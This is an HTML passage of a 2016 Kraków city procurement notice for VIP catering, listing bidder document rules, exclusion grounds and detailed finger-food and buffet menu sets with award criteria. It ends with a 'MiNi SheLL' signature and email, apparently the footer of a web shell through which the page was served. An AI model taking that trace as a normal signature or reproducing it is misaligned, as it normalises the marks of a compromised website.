4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają: 
4.1. każdy z osobna dotyczące go dokumenty wymienione w sekcjach: III.4.1) tiret 1, III.4.2) tiret 2 oraz III.4.4) ogłoszenia; 
4.2. Oświadczenie Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia (zgodnie z art. 22 ust. 1 i 24 ust. 1 ustawy, porównaj sekcja III.4.1) nagłówek oraz III.4.2) tiret pierwszy ogłoszenia). Wzór dokumentu zostaje udostępniony na stronie internetowej Zamawiającego www.bip.krakow.pl od dnia wszczęcia niniejszego postępowania; 
4.3. dokumenty wskazane w sekcji III.4.1) tiret 2 i 3 ogłoszenia składają ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany dokument; 
4.4. dokumenty, o których mowa w pkt III.6) ogłoszenia; 
4.5. dokument, o którym mowa w sekcji IV.1.2) ogłoszenia tj. Wykaz usług - RANKING. 
Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 
D. Uwaga do sekcji II.2) ogłoszenia: Termin wykonania zamówienia: od dnia zawarcia umowy do 20 grudnia 2016 roku lub do wcześniejszego wyczerpania środków finansowych przeznaczonych na realizację przedmiotu umowy.
E. Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług cateringowych dla gości Prezydenta Miasta Krakowa w randze VIP w 2016 roku - Finger food.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług cateringowych dla gości Prezydenta Miasta Krakowa w randze VIP w 2016 roku w tym: przedstawicieli rządów, głów państw, dyplomatów, członków kierownictwa instytucji organizacji międzynarodowych i krajowych, osób prawnych i jednostek organizacyjnych. 
W ramach świadczonych usług cateringowych Wykonawca będzie dostarczał catering sukcesywnie, zgodnie ze zgłaszanym każdorazowo zapotrzebowaniem Zamawiającego na wskazane spotkanie, zgodnie z formularzem zapotrzebowania na usługi cateringowe.
Spotkania, na które dostarczany będzie catering mogą odbywać się w siedzibie Zamawiającego pl. Wszystkich Świętych 3-4 albo w innych miejskich lokalizacjach na terenie Miasta Krakowa.
Świadczenie usług cateringowych przez Wykonawcę obejmować będzie zapewnienie: 
1. przerw kawowych; 
2. zestawu finger food podstawowego; 
3. zestawu finger food pełnego; 
4. zestawu finger food rozszerzonego; 
5. wina i inne. 
W ramach wybranego zestawu zgodnie z zamówieniem zostaną zapewnione co najmniej:
Zestaw 1: Przerwa kawowa.  
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Ciasteczka w papilotach (co najmniej 80 g na osobę), owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 2: Finger food podstawowy.  
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Finger food - do 5 rodzajów po 2 szt. na osobę wybrane (z formularza propozycji menu) (60 g/osobę).
- Deser: co najmniej 3 rodzaje ciastek w papilotach (łącznie co najmniej 100 g na osobę), owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 3: Finger food pełny. 
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Finger food - do 5 rodzajów po 2 szt. na osobę wybrane z formularza propozycji menu (60 g/osobę).
- Danie główne - maksymalnie 2 rodzaje wybrane przez Zamawiającego (z formularza propozycji menu) serwowane w ustalonej z Zamawiającym proporcji, z ewentualnym dodatkiem/ dodatkami do dania głównego. Gramatura dania głównego (mięso/ryba) 150g/100g/100g / osobę [150 g - mięso lub ryba (za wyjątkiem łososia), 100 g - dodatek skrobiowy, 100g - surówka]. Dania jarskie - do uzgodnienia, jednak nie mniej niż 150 g.
- Deser: co najmniej 3 rodzaje ciastek w papilotach (łącznie co najmniej 100 g na osobę) owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 4: Finger food rozszerzony. 
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Finger food - do 5 rodzajów po 2 szt. na osobę (wybrane z formularza propozycji menu). (60 g/osobę).
- Danie główne - maksymalnie 4 rodzaje wybrane przez Zamawiającego (z formularza propozycji menu) serwowane w ustalonej z Zamawiającym proporcji, z ewentualnym dodatkiem/dodatkami do dania głównego. Gramatura dania głównego (mięso/ryba) 150g/100g/100g / osobę [150 g - mięso lub ryba (za wyjątkiem łososia), 100 g - dodatek skrobiowy, 100g - surówka]. Dania jarskie - do uzgodnienia, jednak nie mniej niż 150 g.
- Ewentualnie zupa: - wybrana (z formularza propozycji menu).
- Deser: co najmniej 3 rodzaje ciastek w papilotach (łącznie co najmniej 100 g na osobę) owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 5: Alkohol. 
- Lampka wina białego (100 ml).
- Lampka wina czerwonego (100 ml).
- Aperitif ciepły/zimny (80 ml).
- Piwo (0,3 ml)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 35</li>
<li>2. Jakość potraw określona na podstawie ustalonych próbek - 50</li>
<li>3. Aranżacja stołów - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług cateringowych dla gości Prezydenta Miasta Krakowa w randze VIP w 2016 roku - bufet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług cateringowych dla gości Prezydenta miasta Krakowa w randze VIP w 2016 roku w tym: przedstawicieli rządów, głów państw, dyplomatów, członków kierownictwa instytucji organizacji międzynarodowych i krajowych, osób prawnych i jednostek organizacyjnych. 
W ramach świadczonych usług cateringowych Wykonawca będzie dostarczał catering sukcesywnie, zgodnie ze zgłaszanym każdorazowo zapotrzebowaniem Zamawiającego na wskazane spotkanie, zgodnie z formularzem zapotrzebowania na usługi cateringowe.
Spotkania, na które dostarczany będzie catering mogą odbywać się w siedzibie Zamawiającego pl. Wszystkich Świętych 3-4 albo w innych miejskich lokalizacjach na terenie Miasta Krakowa.
Świadczenie usług cateringowych przez Wykonawcę obejmować będzie zapewnienie: 1. przerw kawowych, 2. zestawu bufetowego podstawowego, 3. zestawu bufetowego pełnego, 4. zestawu bufetowego rozszerzonego, 5. wina i inne. W ramach wybranego zestawu zgodnie z zamówieniem zostaną zapewnione co najmniej: 
Zestaw 1: Przerwa kawowa. 
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Ciasteczka w papilotach (co najmniej 80 g na osobę), owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 2: Bufet podstawowy. 
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Danie główne - maksymalnie 2 rodzaje wybrane przez Zamawiającego z formularza propozycji menu w ustalonej z Zamawiającym proporcji, z ewentualnym dodatkiem/dodatkami do dania głównego. Gramatura dania głównego (mięso/ryba) 150g/100g/100g / osobę [150 g - mięso lub ryba (za wyjątkiem łososia), 100 g - dodatek skrobiowy, 100g - surówka]. Dania jarskie - do uzgodnienia, jednak nie mniej niż 150 g.
- Deser: co najmniej 3 rodzaje ciastek w papilotach (łącznie co najmniej 100 g na osobę) owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 3: Bufet pełny. 
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana 
w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Zimna płyta - obejmująca wędliny, mięsa pieczone, pasztety itp. (co najmniej 100 g na osobę), ryby (w galarecie, w sosie greckim, wędzone, co najmniej 50/25g na osobę), sery (min. 3 rodzaje łącznie 50 g na osobę), wyroby garmażeryjne (200/40g na osobę), sałatki (min 3 rodzaje) sosy do potraw (min 3 rodzaje), pieczywo bez ograniczeń.
- Danie główne - maksymalnie 2 rodzaje wybrane przez Zamawiającego (z formularza propozycji menu) serwowane w ustalonej z Zamawiającym proporcji, z ewentualnym dodatkiem/dodatkami do dania głównego. Gramatura dania głównego (mięso/ryba) 150g/100g/100g / osobę [150 g - mięso lub ryba (za wyjątkiem łososia), 100 g - dodatek skrobiowy, 100g - surówka]. Dania jarskie - do uzgodnienia, jednak nie mniej niż 150 g.
- Deser: co najmniej 3 rodzaje ciastek w papilotach (łącznie co najmniej 100 g na osobę) owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 4: Bufet rozszerzony. 
- Napoje gorące (serwowane bez ograniczeń): kawa parzona w ekspresie ciśnieniowym, herbata (czarna, zielona, smakowe owocowe - pakowana oddzielnie w saszetkach), dodatki - mleko, cukier w cukierniczkach  i/lub w saszetkach (biały, trzcinowy), cytryna w plasterkach, sok malinowy w dzbanuszkach.
- Napoje zimne (serwowane bez ograniczeń): woda - gazowana i niegazowana w butelkach szklanych o pojemności 0,33 l.
- Napoje zimne: soki - 3 rodzaje soków 100% w butelkach szklanych o pojemności 200-330 ml.
- Zimna płyta - obejmująca wędliny, mięsa pieczone, pasztety, itp. (co najmniej 100 g na osobę), ryby (w galarecie, w sosie greckim, wędzone, co najmniej 50/25g na osobę), sery (min. 3 rodzaje łącznie 50 g na osobę), wyroby garmażeryjne (200/40g na osobę), sałatki (min 3 rodzaje), sosy do potraw (min 3 rodzaje), pieczywo bez ograniczeń.
- Danie główne - maksymalnie 4 rodzaje wybrane przez Zamawiającego (z formularza propozycji menu) serwowane w ustalonej z Zamawiającym proporcji, z ewentualnym dodatkiem/dodatkami do dania głównego. Gramatura dania głównego (mięso/ryba) 150g/100g/100g / osobę [150 g - mięso lub ryba (za wyjątkiem łososia), 100 g - dodatek skrobiowy, 100g - surówka]. Dania jarskie - do uzgodnienia, jednak nie mniej niż 150 g.
- Ewentualnie zupa: - wybrana (z formularza propozycji menu).
- Deser: co najmniej 3 rodzaje ciastek w papilotach (łącznie co najmniej 100 g na osobę) owoce filetowane lub klasyczne (100 g/osobę) w zależności od sezonu.
Zestaw 5: Alkohol. 
- Lampka wina białego (100 ml). 
- Lampka wina czerwonego (100 ml). 
- Aperitif ciepły/zimny (80 ml). 
- Piwo (0,3 ml)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 35</li>
<li>2. Jakość potraw określona na podstawie ustalonych próbek - 50</li>
<li>3. Aranżacja stołów - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com